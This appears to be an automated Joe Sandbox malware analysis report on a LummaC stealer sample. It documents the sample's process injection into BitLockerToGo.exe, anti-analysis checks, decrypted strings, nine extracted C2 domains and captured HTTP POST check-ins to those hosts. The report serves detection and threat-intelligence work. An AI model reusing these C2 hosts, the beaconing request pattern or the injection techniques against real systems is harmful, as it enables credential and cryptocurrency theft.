Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
l5u4ezxr.u51.exe

Overview

General Information

Sample name:l5u4ezxr.u51.exe
Analysis ID:1502257
MD5:5bd0ec56270d24c40aa16d7fa73f2538
SHA1:43f9fd5ae32c851b806f501e20e2747b9f831bbe
SHA256:7dae9ea6af1af34b4f423f1fb3e3004f35cfd00781a05fcad1b2714160eb0ac8
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • l5u4ezxr.u51.exe (PID: 6528 cmdline: "C:\Users\user\Desktop\l5u4ezxr.u51.exe" MD5: 5BD0EC56270D24C40AA16D7FA73F2538)
    • BitLockerToGo.exe (PID: 6772 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["stamppreewntnq.shop", "stagedchheiqwo.shop", "locatedblsoqp.shop", "tenseddrywsqio.shop", "millyscroqwp.shop", "traineiwnqo.shop", "condedqpwqm.shop", "caffegclasiqwp.shop", "evoliutwoqm.shop"], "Build id": "LPnhqo--nlczjrpfwadf"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1761754559.0000000002786000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
00000000.00000002.1759655913.00000000022B3000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
        • 0x0:$x1: 4d5a9000030000000
        Click to see the 2 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.BitLockerToGo.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          1.2.BitLockerToGo.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            Timestamp:2024-08-31T21:10:09.989988+0200
            SID:2055493
            Severity:1
            Source Port:49732
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T21:10:10.910343+0200
            SID:2055493
            Severity:1
            Source Port:49733
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T21:10:08.990230+0200
            SID:2055489
            Severity:1
            Source Port:49731
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T21:10:09.511797+0200
            SID:2055483
            Severity:1
            Source Port:64510
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T21:10:10.166995+0200
            SID:2049836
            Severity:1
            Source Port:49732
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T21:10:10.166995+0200
            SID:2054653
            Severity:1
            Source Port:49732
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T21:10:11.436907+0200
            SID:2049812
            Severity:1
            Source Port:49733
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T21:10:11.436907+0200
            SID:2054653
            Severity:1
            Source Port:49733
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T21:10:09.506016+0200
            SID:2049836
            Severity:1
            Source Port:49731
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T21:10:09.506016+0200
            SID:2054653
            Severity:1
            Source Port:49731
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T21:10:08.487141+0200
            SID:2049836
            Severity:1
            Source Port:49730
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T21:10:08.487141+0200
            SID:2054653
            Severity:1
            Source Port:49730
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T21:10:08.512604+0200
            SID:2055479
            Severity:1
            Source Port:65410
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: locatedblsoqp.shopURL Reputation: Label: phishing
            Source: locatedblsoqp.shopURL Reputation: Label: phishing
            Source: traineiwnqo.shopURL Reputation: Label: malware
            Source: traineiwnqo.shopURL Reputation: Label: malware
            Source: condedqpwqm.shopURL Reputation: Label: phishing
            Source: caffegclasiqwp.shopURL Reputation: Label: malware
            Source: millyscroqwp.shopURL Reputation: Label: malware
            Source: stagedchheiqwo.shopURL Reputation: Label: phishing
            Source: https://locatedblsoqp.shop/apiURL Reputation: Label: malware
            Source: stamppreewntnq.shopURL Reputation: Label: phishing
            Source: https://tenseddrywsqio.shop/apiAvira URL Cloud: Label: malware
            Source: https://traineiwnqo.shop/api_Avira URL Cloud: Label: malware
            Source: https://locatedblsoqp.shop/6Avira URL Cloud: Label: phishing
            Source: https://traineiwnqo.shop/apiAvira URL Cloud: Label: malware
            Source: https://locatedblsoqp.shop/Avira URL Cloud: Label: phishing
            Source: https://traineiwnqo.shop/apibulAvira URL Cloud: Label: malware
            Source: https://traineiwnqo.shop/fXxAvira URL Cloud: Label: malware
            Source: https://traineiwnqo.shop/apiKAvira URL Cloud: Label: malware
            Source: https://traineiwnqo.shop/.Avira URL Cloud: Label: malware
            Source: https://traineiwnqo.shop:443/apiiAvira URL Cloud: Label: malware
            Source: https://traineiwnqo.shop/Avira URL Cloud: Label: malware
            Found malware configuration
            Source: 1.2.BitLockerToGo.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["stamppreewntnq.shop", "stagedchheiqwo.shop", "locatedblsoqp.shop", "tenseddrywsqio.shop", "millyscroqwp.shop", "traineiwnqo.shop", "condedqpwqm.shop", "caffegclasiqwp.shop", "evoliutwoqm.shop"], "Build id": "LPnhqo--nlczjrpfwadf"}
            Multi AV Scanner detection for domain / URL
            Source: tenseddrywsqio.shopVirustotal: Detection: 14%Perma Link
            Source: tenseddrywsqio.shopVirustotal: Detection: 14%Perma Link
            Source: https://tenseddrywsqio.shop/apiVirustotal: Detection: 16%Perma Link
            Source: https://traineiwnqo.shop/apiVirustotal: Detection: 21%Perma Link
            Source: https://locatedblsoqp.shop/Virustotal: Detection: 16%Perma Link
            Source: https://traineiwnqo.shop:443/apiiVirustotal: Detection: 11%Perma Link
            Source: https://traineiwnqo.shop/Virustotal: Detection: 19%Perma Link
            Source: https://traineiwnqo.shop/.Virustotal: Detection: 19%Perma Link
            Multi AV Scanner detection for submitted file
            Source: l5u4ezxr.u51.exeVirustotal: Detection: 21%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: caffegclasiqwp.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: stamppreewntnq.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: stagedchheiqwo.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: millyscroqwp.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: evoliutwoqm.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: condedqpwqm.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: traineiwnqo.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: locatedblsoqp.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: tenseddrywsqio.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: caffegclasiqwp.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: stamppreewntnq.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: stagedchheiqwo.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: millyscroqwp.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: evoliutwoqm.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: condedqpwqm.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: traineiwnqo.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: locatedblsoqp.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: tenseddrywsqio.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: caffegclasiqwp.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: stamppreewntnq.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: stagedchheiqwo.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: millyscroqwp.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: evoliutwoqm.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: condedqpwqm.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: traineiwnqo.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: locatedblsoqp.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: tenseddrywsqio.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: caffegclasiqwp.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: stamppreewntnq.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: stagedchheiqwo.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: millyscroqwp.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: evoliutwoqm.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: condedqpwqm.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: traineiwnqo.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: locatedblsoqp.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: tenseddrywsqio.shop
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString decryptor: LPnhqo--nlczjrpfwadf
            Source: l5u4ezxr.u51.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.69.149:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: l5u4ezxr.u51.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.000000000274C000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1755794344.00000000027CD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.000000000274C000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1755794344.00000000027CD000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_004321F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_004323E3
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00419040
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [ecx+esi*2]1_2_0042D070
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [esp]1_2_00434030
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000280h]1_2_0040D0D0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_004208E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], dl1_2_0040D978
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]1_2_00434110
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [esp]1_2_00434110
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [edx+eax-01h]1_2_004089F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h1_2_00420980
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [ebx]1_2_00435990
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_00413A4A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add edi, 02h1_2_00413A4A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]1_2_0041FACE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_0041FACE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h1_2_00435280
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]1_2_00403290
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp]1_2_004312A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+1Ch]1_2_0040B310
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [esi], cx1_2_0041BB22
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [ecx]1_2_0041BB22
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, dword ptr [esp+40h]1_2_0041BB22
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, 00008000h1_2_004043C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 84AA3BD1h1_2_004353C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_0043238A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [ebp-1Ch]1_2_00433BA8
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [esp]1_2_00433C40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [esp]1_2_00434450
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_004324BC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_00429540
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [ebp-1Ch]1_2_004335D2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h1_2_00418DE0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_0040FDEB
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax1_2_0041EDFE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [esp]1_2_00433D90
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi+08h], eax1_2_004235B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al1_2_004235B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], dl1_2_004235B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]1_2_0042F6F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]1_2_00431E80
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [esp]1_2_00433F40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h1_2_00412F50
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp cl, 0000002Eh1_2_0041D752
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al1_2_00414770
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h1_2_00412FA0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+000000B0h]1_2_0040F7AA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea ebx, dword ptr [esp+08h]1_2_0041F7B2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax1_2_004197B7

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.4:65410 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.4:64510 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.4:49733 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.4:49732 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.4:49731 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.69.149:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.69.149:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: stamppreewntnq.shop
            Source: Malware configuration extractorURLs: stagedchheiqwo.shop
            Source: Malware configuration extractorURLs: locatedblsoqp.shop
            Source: Malware configuration extractorURLs: tenseddrywsqio.shop
            Source: Malware configuration extractorURLs: millyscroqwp.shop
            Source: Malware configuration extractorURLs: traineiwnqo.shop
            Source: Malware configuration extractorURLs: condedqpwqm.shop
            Source: Malware configuration extractorURLs: caffegclasiqwp.shop
            Source: Malware configuration extractorURLs: evoliutwoqm.shop
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tenseddrywsqio.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traineiwnqo.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=3xk4E.2nDymKStRO43vRDjy22JgE06_vJkNrLPyvrcg-1725131410-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: traineiwnqo.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: tenseddrywsqio.shop
            Source: global trafficDNS traffic detected: DNS query: locatedblsoqp.shop
            Source: global trafficDNS traffic detected: DNS query: traineiwnqo.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tenseddrywsqio.shop
            Source: l5u4ezxr.u51.exeString found in binary or memory: https://api.loganalytics.iohttps://api.loganalytics.usencountered
            Source: l5u4ezxr.u51.exeString found in binary or memory: https://datalake.azure.net/https://graph.microsoft.us/servicebus.chinacloudapi.cndocuments.microsoft
            Source: l5u4ezxr.u51.exeString found in binary or memory: https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.netdev.azuresynapse.usgovcloudapi.n
            Source: BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/
            Source: BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/6
            Source: BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/api
